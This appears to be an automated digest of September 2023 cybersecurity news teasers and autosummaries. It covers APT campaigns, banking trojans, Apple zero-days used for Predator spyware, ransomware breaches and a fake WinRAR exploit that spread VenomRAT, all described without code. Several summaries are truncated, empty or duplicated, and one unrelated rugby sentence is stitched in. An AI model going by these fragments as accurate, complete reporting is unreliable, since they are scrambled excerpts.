One group poses as the opposing force, or in this case, cyber criminals, while testing the ability of the defenders to detect and protect against such attacks.Hands-on threat simulations will arm cybersecurity experts with the skills and confidence necessary to react to a cyber-attack calmly and efficiently, whilst protecting the company’s sensitive data and avoiding costly damages.This allows them to quickly check the efficacy of their monitoring tools, as well as their people and processes, on an ongoing basis, that is accurate to current threats. "Changing approaches to cybersecurity have led to slow but steady progress in defense and protection. Still, competing interests create a growing challenge for cybersecurity decision makers and practitioners, according to CompTIA. The state of cybersecurity Most business and technology professionals feel that cybersecurity is improving, both generally and within their organizations. They also acknowledge that the stakes have grown dramatically, with the number of cybercriminals and threats skyrocketing. At the same time, companies are capturing … More
The post Balancing cybersecurity with convenience and progress appeared first on Help Net Security.
"Autosummary:
Threat focus areas for organizations include malware, cited by 40% of U.S. respondents, ransomware (33%), firmware hacking (31%), IoT-based attacks (31%), hardware-based attacks (31%) and phishing (30%). Monitoring network traffic and detecting malware (53%) Analyzing user behavior patterns (50%) Automating response to cybersecurity incidents (48%) Automating configuration of cybersecurity infrastructure (45%) "Autosummary:
The malware eschews the use of shellcode in favor of three DLL-based components to set up persistence on the endpoint, establish command-and-control communications with a remote server, and carry out information-gathering operations, including command execution, file system interaction, keylogging, and screen capture. "A new variant of a banking trojan, called BBTok, targets users of over 40 banks in Latin America, particularly Brazil and Mexico. Check Point researchers warn of a new variant of a banking trojan, called BBTok, that is targeting users of over 40 banks in Latin America. The new malware campaign relies on new infection chains and […]
The post New variant of BBTok Trojan targets users of +40 banks in LATAM appeared first on Security Affairs.
"Autosummary:
New variant of BBTok Trojan targets users of +40 banks in LATAM Pierluigi Paganini September 25, 2023 September 25, 2023 A new variant of a banking trojan, called BBTok, targets users of over 40 banks in Latin America, particularly Brazil and Mexico. "A stealthy APT group tracked as Gelsemium was observed targeting a Southeast Asian government between 2022 and 2023. Palo Alto Unit42 researchers an APT group tracked as Gelsemium targeting a Southeast Asian government. The experts tracked the cluster as CL-STA-0046, the malicious activity spanned over six months between 2022-2023. The activity was characterized by the […]
The post Is Gelsemium APT behind a targeted attack in Southeast Asian Government? appeared first on Security Affairs.
"Autosummary:
Pierluigi Paganini September 25, 2023 September 25, 2023 A stealthy APT group tracked as Gelsemium was observed targeting a Southeast Asian government between 2022 and 2023. "Autosummary:
Volt Typhoon/VANGUARD PANDA attacks Researchers from Microsoft have reported that a Chinese-speaking threat actor, Volt Typhoon, was able to establish persistent access inside critical infrastructure targets in the US, including the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors.In the most recent campaign, the group targeted organizations in the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors.Winnkit, a credential-dumping tool, a screenshotting tool, a process-hollowing tool, an SQL tool, Mimikatz, ForkPlayground, and proxy configuration tools.Infrastructure associated with the threat actor has been identified in more than 50 countries across North America, South America, Europe, Africa, Asia and Australia, targeting government networks, research facilities, and journalists.The tools used, which include commodity information stealers, RATs (such as AveMaria/Warzone RAT, LodaRAT), Python-based RATs and information stealers, and Python- and Meterpreter-based reverse shells, are delivered via phishing emails containing malicious LNK attachments and decoy PDF documents. Earth Longzhi attacks After several months of inactivity, Earth Longzhi (believed to be a sub-group of APT41) targeted healthcare, manufacturing, technology and government organizations in Taiwan, Thailand, the Philippines and Fiji. Middle East-related activity Mint Sandstorm/Charming Kitten attacks The threat actor Mint Sandstorm (aka Charming Kitten group, previously tracked as Phosphorous), which researchers believe is linked to the Iranian government, is conducting cyberattacks against US critical infrastructure, particularly organizations in the energy and transportation sectors. BlueDelta/Sofacy attacks According to Recorded Future’s Insikt Group and Ukraine’s Computer Emergency Response Team (CERT-UA), BlueDelta (aka Sofacy, APT28, Fancy Bear and Sednit) exploited vulnerabilities in Roundcube Webmail to hack more than 40 Ukrainian organizations, including government institutions and military entities connected to aviation infrastructure. Other detected malicious activity included listing processes, testing network connectivity, gathering user and group information, mounting shares, enumerating domain trust over WMI, and listing DNS zones over WMI. The attackers use a variety of techniques in these attacks, including password spraying, brute force, token theft, and session replay, to gain unauthorized access to cloud resources. APT attacks with CommonMagic and CloudWizard framework Kaspersky researchers discovered an ongoing campaign, active since Q3 2021, targeting government, agricultural and transportation organizations in the conflict-affected region of Eastern Europe, using a previously unknown malware set. Compromised organizations operate in various industries, including manufacturing, wealth management, insurance, and pharmaceuticals. "Autosummary:
"Autosummary:
Most recently, in March 2023, Hadoken released the third major version of Xenomorph, featuring an automated transfer system (ATS) for autonomous on-device transactions, MFA bypass, cookie stealing, and the ability to target over 400 banks. "Autosummary:
The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host. "Experts warn of a critical vulnerability in the TeamCity CI/CD server that can be exploited to take over a vulnerable server. JetBrains TeamCity is a popular and highly extensible Continuous Integration (CI) and Continuous Delivery (CD) server developed by JetBrains, a software development company known for its developer tools. TeamCity is designed to automate various […]
The post Alert! Patch your TeamCity instance to avoid server hack appeared first on Security Affairs.
"Autosummary:
Patch your TeamCity instance to avoid server hack Pierluigi Paganini September 25, 2023 September 25, 2023 Experts warn of a critical vulnerability in the TeamCity CI/CD server that can be exploited to take over a vulnerable server. "Autosummary:
"A phishing campaign targets Ukrainian military entities using drone manuals as lures to deliver the post-exploitation toolkit Merlin. Securonix researchers recently uncovered a phishing campaign using a Pilot-in-Command (PIC) Drone manual document as a lure to deliver a toolkit dubbed Merlin. The campaign, codenamed STARK#VORTEX by Securonix, targets Ukrainian military entities and CERT-UA attributed it […]
The post A phishing campaign targets Ukrainian military entities with drone manual lures appeared first on Security Affairs.
"Autosummary:
A phishing campaign targets Ukrainian military entities with drone manual lures Pierluigi Paganini September 25, 2023 September 25, 2023 A phishing campaign targets Ukrainian military entities using drone manuals as lures to deliver the post-exploitation toolkit Merlin. "Categories: News The ransomware group RansomedVC says its selling Sony"s data. |
The post Ransomware group claims it"s "compromised all of Sony systems" appeared first on Malwarebytes Labs.
"Autosummary:
Sony Group Corporation, formerly Tokyo Telecommunications Engineering Corporation, and Sony Corporation, is a Japanese multinational conglomerate corporation headquartered in Minato, Tokyo, Japan We have successfully compromissed [sic] all of sony systems.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Notable victims have included Capcom and Ubisoft in 2020, and CD PROJEKT RED, makers of Cyberpunk 2077 and Witcher 3, in 2021, the same year that FIFA 21 source code stolen from Electronic Arts. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LLM Guard: Open-source toolkit for securing Large Language Models LLM Guard is a toolkit designed to fortify the security of Large Language Models (LLMs). It is designed for easy integration and deployment in production environments. Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion The Dragos Platform is technology built for practitioners by practitioners that arms … More
The post Week in review: 18 free Microsoft Azure cybersecurity resources, K8 vulnerability allows RCE appeared first on Help Net Security.
"Autosummary:
Apple fixes 3 zero-day vulnerabilities exploited to compromise iPhones Apple has released updates for iOS and iPadOS, macOS, watchOS, and Safari to fix three zero-day vulnerabilities (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) exploited “against versions of iOS before iOS 16.7.” New infosec products of the week: September 22, 2023 Here’s a look at the most interesting products from the past week, featuring releases from 1Password, Dig Security, Laiyer.ai, Viavi Solutions, and Wing Security. "U.S. educational nonprofit organization National Student Clearinghouse disclosed a data breach that impacted approximately 900 US schools. The National Student Clearinghouse (NSC) is a nonprofit organization based in the United States that provides educational verification and reporting services to educational institutions, employers, and other organizations The organization has disclosed a data breach that impacted approximately […]
The post National Student Clearinghouse data breach impacted approximately 900 US schools appeared first on Security Affairs.
"Autosummary:
The attack took place on May 30 and threat actors gained access to relevant files containing personal information such as name, date of birth, contact information, Social Security number, student ID number, and certain school-related records (for example, enrollment records, degree records, and course-level data). "The Alphv ransomware group claims to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles. The Alphv ransomware group added Clarion, the global manufacturer of audio and video equipment for cars and other vehicles, to the list of victims on its Tor leak site. Clarion Japan is the Japanese subsidiary […]
The post Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars appeared first on Security Affairs.
"Autosummary:
The company has more than 10,000 employees, it also provides its components to other automakers, including Suzuki, Toyota, Subaru, Ford, Volkswagen, Proton, and Peugeot. "Autosummary:
"Autosummary:
CVE-2023-4762, a type confusion vulnerability in the V8 engine, was anonymously reported on August 16, 2023, and patched by Google on September 5, 2023, although the internet giant assesses that Cytrox/Intellexa may have used this vulnerability as a zero-day. "The City of Dallas revealed that the Royal ransomware gang that hit the city system in May used a stolen account. In May 2023, a ransomware attack hit the IT systems at the City of Dallas, Texas. To prevent the threat from spreading within the network, the City shut down the impacted IT systems. The […]
The post City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack appeared first on Security Affairs.
"Autosummary:
The ransomware encrypts the network shares, that are found on the local network and the local drives, with the AES algorithm In March, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. According to the notice published on the website of the OAG on August 07, 2023, exposed personal information includes names, addresses, social security information, health information, and health insurance information. "Autosummary:
"Autosummary:
Stealth Falcon (aka FruityArmor) was first exposed by the Citizen Lab in 2016, linking it to a set of targeted spyware attacks in the Middle East aimed at journalists, activists, and dissidents in the U.A.E. using spear-phishing lures embedding booby-trapped links pointing to macro-laced documents to deliver a custom implant capable of executing arbitrary commands. "Autosummary:
" The personally identifiable information (PII) contained in the stolen documents includes names, dates of birth, contact information, Social Security numbers, student ID numbers, and some school-related records (e.g., enrollment records, degree records, and course-level data). "The Government of Bermuda believes that the recent cyberattack against its IT infrastructure was launched by Russian threat actors. This week a cyber attack hit the Government of Bermuda causing the interruption of internet/email and phone services. The attack impacted all the government departments. “The Department of Information and Digital Technology (IDT) is working quickly […]
The post Government of Bermuda blames Russian threat actors for the cyber attack appeared first on Security Affairs.
"Autosummary:
Walter Roban, JP, MP:, JP, MP, provided an update on the cyberattack: “As a result of our network interruption, there will be no sitting of the House of Assembly,” a government spokeswoman had confirmed. "Autosummary:
"Autosummary:
Sigren believes in four years the results against top-ranked teams may change, drawing comparisons to Chile losing 56-0 to Canada in 2019 - a team they beat two years later to prevent Canada appearing in France. "Autosummary:
The information collector uses WMI queries to feed the Orchestrator with the following information about the compromised system: operating system network adapters installed software drives services drivers processes users environment variables security software The process creator is a command execution tool that executes specified commands as a new process and gives the result to the Orchestrator. "Autosummary:
Supercharge Your Skills There is evidence to suggest that both CVE-2023-41064, a buffer overflow vulnerability in Apple"s Image I/O image parsing framework, and CVE-2023-4863, a heap buffer overflow in the WebP image library (libwebp), could refer to the same bug, according to Isosceles founder and former Google Project Zero researcher Ben Hawkes. "Autosummary:
"Overall cyber insurance claims frequency increased by 12% in the first half of 2023, according to Coalition. Increase in ransomware claims frequency Coalition found that both claims frequency and severity rose for businesses in early 2023 across all revenue bands. Companies with over $100 million in revenue saw the largest increase (20%) in the number of claims as well as more substantial losses from attacks – with a 72% increase in claims severity from 2H … More
The post Ransomware cyber insurance claims up by 27% appeared first on Help Net Security.
"Autosummary:
“The cyber threat landscape has become more volatile, and, as a result, we’ve seen claims become more severe and more common than ever,” said Chris Hendricks, Head of Coalition Incident Response. "57% of SMEs have fallen victim to at least one cybersecurity breach, among whom 31% reported that their business experienced a breach within the past 12 months alone, according to Guardz. The increasing number of evolving cyber threats poses a significant risk to SMEs. Rising patterns show frequent and sophisticated attacks, highlighting the urgent need for effective security measures. Businesses neglect employee cybersecurity training Meanwhile, 29% of small and medium-sized businesses reported currently having no … More
The post SMEs overestimate their cybersecurity preparedness appeared first on Help Net Security.
"Autosummary:
However, 44% of respondents believe that their current antivirus solution fully protects their business, employees, and data, and 25% of businesses admit to not regularly training their employees on cybersecurity best practices or never have. "GitLab has fixed a critical vulnerability (CVE-2023-5009) in the Enterprise Edition (EE) and Community Edition (CE) of its widely used DevOps platform. The flaw may allow a threat actor to abuse scan execution policies to run pipelines as another user. About the vulnerability (CVE-2023-5009) CVE-2023-5009 – discovered by software developer and bug hunter Johan Carlsson (joaxcar) in GitLab EE – affects all versions starting from 13.12 before 16.2.7 and all versions starting from 16.3 before … More
The post GitLab fixes critical vulnerability, patch now! (CVE-2023-5009) appeared first on Help Net Security.
"Autosummary:
About the vulnerability (CVE-2023-5009) CVE-2023-5009 – discovered by software developer and bug hunter Johan Carlsson (joaxcar) in GitLab EE – affects all versions starting from 13.12 before 16.2.7 and all versions starting from 16.3 before 16.3.4, IF the “direct transfers” and “security policies” features are enabled at the same time. "Apple has released updates for iOS and iPadOS, macOS, watchOS, and Safari to fix three zero-day vulnerabilities (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) exploited “against versions of iOS before iOS 16.7.” Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group have been credited with reporting them, so the flaws have probably been used to deploy spyware. The patched zero-days (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) CVE-2023-41992, in the Kernel … More
The post Apple fixes 3 zero-day vulnerabilities exploited to compromise iPhones appeared first on Help Net Security.
"Autosummary:
The patched zero-days (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) CVE-2023-41992, in the Kernel framework, allows a local attacker to elevate privileges. "Autosummary:
Storm-0133, also associated with MOIS, exclusively targets Israeli local government agencies and companies serving the defense, lodging, and healthcare sectors, the Windows maker said. "To help protect consumers from browser-based security, privacy and identity threats, Norton, a consumer Cyber Safety brand of Gen, has released Norton Secure Browser. Just as a passport is essential for travel, web browsers are essential for exploring the internet, and serve as the gateway to websites, information, and experiences. However, they are also superhighways of personal information for cybercriminals to exploit, and the dream tool for advertisers to track online activity and collect insights … More
The post Norton Secure Browser blocks malicious websites and phishing attempts appeared first on Help Net Security.
"Autosummary:
“Cybercriminals are becoming more creative in their pursuits to attack people this year, and advertisers are more eager than ever to capture as many interactions as possible to profile people and target them with ads and content,” said Ben Wadors, Director of Browser and Search at Gen. “Norton Secure Browser helps tackle both problems. "Keysight Technologies and Synopsys are partnering to provide internet of things (IoT) device makers with a comprehensive cybersecurity assessment solution to ensure consumers are protected when devices are shipped to market. Under the arrangement, the Synopsys Defensics fuzzing tool will be embedded as an option into the Keysight IoT Security Assessment solution. The global IoT device market is experiencing notable growth due to the rise in adoption of IoT devices and is projected to reach … More
The post Keysight collaborates with Synopsys to secure IoT devices against attacks appeared first on Help Net Security.
"Autosummary:
"Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack. Air Canada, the flag carrier and largest airline of Canada, announced that threat actors had access to the personal information of some employees during a recent cyberattack. “An […]
The post Information of Air Canada employees exposed in recent cyberattack appeared first on Security Affairs.
"Autosummary:
Information of Air Canada employees exposed in recent cyberattack Pierluigi Paganini September 22, 2023 September 22, 2023 Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack. "Autosummary:
" On iOS devices, the attackers" zero-day exploit used CVE-2023-41993 for initial remote code execution (RCE) in Safari using maliciously crafted web pages, the CVE-2023-41991 bug to bypass signature validation, and CVE-2023-41992 for kernel privilege escalation. "Autosummary:
"Autosummary:
Forum post claiming to share T-Mobile data Source: BleepingComputer The archive posted to the hacking forum contains a large amount of data, including employee IDs, employment status, hire dates, termination dates, rehire dates, job titles, department, names, last four digits of social security number, and email addresses. "Autosummary:
It"s equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate keyboard, and serve fake login pages for banks operating in the two countries. "US CISA added the flaw CVE-2023-41179 in Trend Micro Apex and other security products to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the high-severity flaw CVE-2023-41179 (CVSS score 7.2) affecting Trend Micro Apex One and Worry-Free Business Security to its Known Exploited Vulnerabilities Catalog. Trend Micro this week has released security updates to patch […]
The post CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Trend Micro this week has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products. "Autosummary:
The process of restoring all servers took just over 5 weeks, from May 9th, when the financial server was revived, to June 13th, when the last server affected by the attack, the waste management server, was restored. "Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware. Researchers from the Citizen Lab and Google’s Threat Analysis Group (TAG) revealed that the three Apple zero-days addressed this week were used as part of an exploit to install Cytrox Predator spyware. Apple this week […]
The post Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware appeared first on Security Affairs.
"Autosummary:
“During our investigation, we worked with Google’s Threat Analysis Group (TAG) to obtain an iPhone zero-day exploit chain (CVE-2023-41991, CVE-2023-41992, CVE-2023-41993) designed to install Predator on iOS versions through 16.6.1.Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware Pierluigi Paganini September 22, 2023 September 22, 2023 Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware. "Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: emergency Tags: update Tags: CVE-2023-41991 Tags: CVE-2023-41992 Tags: CVE-2023-41993 Apple has released patches for three zero-day vulnerabilities that may have been actively exploited. |
The post Emergency update! Apple patches three zero-days appeared first on Malwarebytes Labs.
"Autosummary:
The Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs & Public Policy, University of Toronto, focusing on research and development at the intersection of information and communication technologies, human rights, and global security. "In this Help Net Security interview, Baya Lonqueux, CEO at Reciproc-IT, discusses the evolving cybersecurity landscape and the essential skillsets needed for teams working in this field. The interview highlights the shift from technical expertise to a focus on organizational and governance skills for managing business cybersecurity risks. Lonqueux also addresses the proactive measures required to mitigate cybersecurity risks, emphasizing the importance of identifying security needs, ensuring compliance, and simulating risks for prioritized actions. Even … More
The post How companies can take control of their cybersecurity appeared first on Help Net Security.
"Autosummary:
Lonqueux also addresses the proactive measures required to mitigate cybersecurity risks, emphasizing the importance of identifying security needs, ensuring compliance, and simulating risks for prioritized actions.Companies, for their part, need to target their protection strategy, securing what is sensitive, isolating critical assets to avoid massive surveillance protections that encourage error. "50% of companies lack a dedicated security function for control systems and devices within their organizational structure, according to Cybellum. Security incidents involving industrial organizations have seen a sharp rise in recent years, with notable cases highlighting the vulnerabilities in our interconnected world. IT-OT convergence, as well as the trend towards remote maintenance, amplify potential risks even further. As industrial devices become increasingly software-driven machines reliant on an insecure software supply chain, and with regulatory … More
The post Regulatory pressure complicates cybersecurity for industrial equipment manufacturers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The fake PoC meant to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, which is tracked as CVE-2023-25157," Palo Alto Networks Unit 42 researcher Robert Falcone said. "An unknown threat actor has released a fake proof of concept (PoC) exploit for CVE-2023-4047, a recently fixed remote code execution (RCE) vulnerability in WinRAR, to spread the VenomRAT malware. The fake WinRAR PoC On August 17, 2023, Trend Micro’s Zero Day Initiative reported the RCE vulnerability (CVE-2023-4047) that allowed threat actors to execute arbitrary code on an affected WinRAR installation. The attacker (“whalersplonk”) took the opportunity to release a fake PoC on GitHub only … More
The post Fake WinRAR PoC spread VenomRAT malware appeared first on Help Net Security.
"Autosummary:
"Trend Micro has fixed a critical zero-day vulnerability (CVE-2023-41179) in several of its endpoint security products for enterprises that has been spotted being exploited in the wild. About CVE-2023-41179 The nature of the flaw hasn’t been revealed, but we know it’s present in the third-party AV uninstaller module provided with the products, and can be exploited to execute arbitrary code with the system privilege on the PC where a vulnerable security agent is installed. CVE-2023-41179 … More
The post Critical Trend Micro vulnerability exploited in the wild (CVE-2023-41179) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Gold Melody has been previously linked to attacks exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers. "Autosummary:
"It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software," it said in an alert last week. "Autosummary:
"Autosummary:
"Autosummary:
Snatch first appeared in 2018, albeit originally under the name Team Truniger (Truniger, explains the FBI and CISA advisory, was the online handle of a key member who had previously worked as an affiliate of the GandCrab ransomware-as-a-service operation.) The FBI and US Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint advisory warning organisations about a ransomware-as-a-service operation called "Snatch." Snatch? using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication. "Autosummary:
A majority of the compromises have been reported in China, the U.S., Germany, the U.K., Singapore, Hong Kong, and Japan. "Autosummary:
The malware"s main components (SentinelLabs) Upon initialization, LuaDream connects to a C2 server (via TCP, HTTPS, WebSocket, or QUIC) and sends gathered information, including malware versions, IP/MAC addresses, OS details, etc. "Autosummary:
The disclosure coincides with a parallel report from SentinelOne which detailed sustained strategic intrusions by Chinese threat actors in Africa, including those aimed at telecommunication, finance and government sectors in Africa, as part of activity clusters dubbed BackdoorDiplomacy, Earth Estries, and Operation Tainted Love. "Apple released emergency security updates to address three new actively exploited zero-day vulnerabilities. Apple released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild. The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School […]
The post Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws appeared first on Security Affairs.
"Autosummary:
Fixes are available for iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, iPad mini 5th generation and later Apple has already patched 16 actively exploited zero-day vulnerabilities in 2023, below is the list of the flaws fixed by the company: September 2023 – CVE-2023-41064 and CVE-2023-41061. "Categories: News Categories: Personal If you"ve received a message from a company saying your data has been caught up in a breach, you might be unsure what to do next. Well, we have some tips for you... |
The post Involved in a data breach? Here’s what you need to know appeared first on Malwarebytes Labs.
"Autosummary:
3. Enable multi-factor authentication Multi-factor authentication (MFA) adds an extra layer of security when logging in to your online accounts, and stops anyone from logging in with just your password. 1. Check the company’s advice Every breach is different, so check the company"s official channels to find out what"s happened and what data has been breached. "Categories: Personal Tags: cryptocurrency Tags: mark cuban Tags: scam Tags: phish Tags: phishing Tags: wallet Tags: hot Tags: cold Tags: metamask Tags: extension Tags: browser Tags: mobile Tags: android Tags: search engine We take a look at a common cryptocurrency scam which focuses on your recovery phrase. |
The post Steer clear of cryptocurrency recovery phrase scams appeared first on Malwarebytes Labs.
"Autosummary:
No matter the third party website, offer, video, service, or any form of giveaway: don’t do it. "Autosummary:
"Autosummary:
"Far exceeding a traditional public cloud platform, Azure is a comprehensive suite of over 200 products and cloud services engineered to solve current challenges and pave the way for the future. Whether you’re looking to build, run, or manage applications, Azure’s extensive offerings span multiple clouds, on-premises setups, and even the edge, allowing you the flexibility to use the tools and frameworks you’re most comfortable with. Here’s a list of free Azure cybersecurity resources that … More
The post 18 free Microsoft Azure cybersecurity resources you should check out appeared first on Help Net Security.
"Autosummary:
By the end of this module you will be able to: Implement and manage a user risk policy Implement and manage sign-in risk policies Implement and manage MFA registration policy Monitor, investigate, and remediate elevated risky users 33 min Explore how to use built-in Azure roles, managed identities, and RBAC-policy to control access to Azure resources.By the end of this module, you are able to: Design security operations capabilities in hybrid and multi-cloud environments Design centralized logging and auditing Design SIEM solutions Design a solution for detection and response that includes XDR Design a solution for SOAR Design security workflows Design and evaluate threat detection with the MITRE ATT&CK framework More resources:By the end of this module, you’re able to: Evaluate security posture by using Microsoft Cloud Security Benchmark, Microsoft Defender for Cloud, and Secure Scores Design integrated security posture management and workload protection solutions in hybrid and multicloud environments Design cloud workload protection solutions that use Microsoft Defender for Cloud 42 min Securing Azure AI Services can help prevent data loss and privacy violations for user data that may be a part of the solution.By the end of this module, you will be able to: Define what a key vault is and how it protects certificates and secrets Deploy and configure Azure Key Vault Secure access and administration of your key vault Store keys and secrets in your key vault Explore key security considers like key rotation and backup / recovery 45 min Learn how Azure Storage provides multilayered security to protect your data. "60% of cyberattacks against the industrial sector are led by state-affiliated actors and often unintentionally enabled by internal personnel (about 33% of the time), according to Rockwell Automation. This corroborates other industry research showing OT/ICS (Industrial Control Systems) cybersecurity incidents are increasing in volume and frequency, and are targeting critical infrastructure, such as energy producers. Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure … More
The post Rising OT/ICS cybersecurity incidents reveal alarming trend appeared first on Help Net Security.
"Autosummary:
Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure industries under attack in the majority of reported incidents,” said Mark Cristiano, commercial director of Global Cybersecurity Services at Rockwell Automation. "72% of banks and credit unions are prioritizing compliance when evaluating fintechs, citing it as their top criteria in the due diligence process, according to Ncontracts. As banks and credit unions evaluate fintech partnerships, cybersecurity (62%) is also a critical factor, followed by return on investment (46.3%) and reputation (44.4%). Financial institutions look to streamline operations Bank-fintech partnerships continue to rise as financial institutions look to streamline operations, improve customer experiences, drive profitability, and manage … More
The post Strong compliance management is crucial for fintech-bank partnerships appeared first on Help Net Security.
"Autosummary:
Financial institutions look to streamline operations Bank-fintech partnerships continue to rise as financial institutions look to streamline operations, improve customer experiences, drive profitability, and manage risk and compliance efforts. "Autosummary:
Zyxel EMG2926 Routers Command Injection Vulnerability CVE-2021-3129 (CVSS score: 9.8) - Laravel Ignition File Upload Vulnerability (CVSS score: 9.8) - Laravel Ignition File Upload Vulnerability CVE-2022-22265 (CVSS score: 7.8) - Samsung Mobile Devices Use-After-Free Vulnerability (CVSS score: 7.8) - Samsung Mobile Devices Use-After-Free Vulnerability CVE-2022-31459 (CVSS score: 6.5) - Owl Labs Meeting Owl Inadequate Encryption Strength Vulnerability (CVSS score: 6.5) - Owl Labs Meeting Owl Inadequate Encryption Strength Vulnerability CVE-2022-31461 (CVSS score: 6.5) - Owl Labs Meeting Owl "Trend Micro addressed a zero-day code execution vulnerability (CVE-2023-41179) in Apex One that has been actively exploited in the wild. Trend Micro has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products. According to the security […]
The post Trend Micro addresses actively exploited zero-day in Apex One and other security Products appeared first on Security Affairs.
"Autosummary:
Trend Micro has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products. "Autosummary:
"Red Hat announced a new industrial edge platform, designed in collaboration with Intel, that will provide a modern approach to building and operating industrial controls. By transforming the way manufacturers operate, scale and innovate with standard IT technologies delivered to the plant floor and real-time data insights, the platform will enable industrial control system (ICS) vendors, system integrators (SIs) and manufacturers to automate previously manual industrial automation tasks including: system development, deployment and management, cybersecurity … More
The post Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor appeared first on Help Net Security.
"Autosummary:
With this collaboration organizations can benefit from: Fully integrated real-time capabilities from silicon to software, to support industrial automation for predictable performance; from silicon to software, to support industrial automation for predictable performance; Advanced management and network automation for system deployment and management without heavy handed resource usage, simplifying the industrial network creation and management using open standards-based tools; for system deployment and management without heavy handed resource usage, simplifying the industrial network creation and management using open standards-based tools; Scalability and flexibility through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; Uninterrupted operations supported by high-availability and redundancy attributes built-in with the platform; supported by high-availability and redundancy attributes built-in with the platform; Simplified AI workload integration with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity, and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity, and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; Enhanced cybersecurity posture by removing human error elements with automated patching and updates, an immutable operating system plane and a platform built on hardened, production-tested components. "Autosummary:
"GitLab rolled out security patches to address a critical vulnerability, tracked as CVE-2023-5009, that can be exploited to run pipelines as another user. GitLab has released security patches to address a critical vulnerability, tracked as CVE-2023-5009 (CVSS score: 9.6), that allows an attacker to run pipelines as another user. The issue resides in GitLab EE and affects […]
The post GitLab addressed critical vulnerability CVE-2023-5009 appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
In late 2022, researchers unearthed thousands of GitHub repositories promoting fraudulent PoC exploits for diverse vulnerabilities, with several deploying malware, malicious PowerShell scripts, concealed info-stealer downloaders, and Cobalt Strike droppers. Real PoC (left) and modified script (right) (Unit 42) When executed, instead of running the exploit, the PoC creates a batch script that downloads an encoded PowerShell script and executes it on the host. "Autosummary:
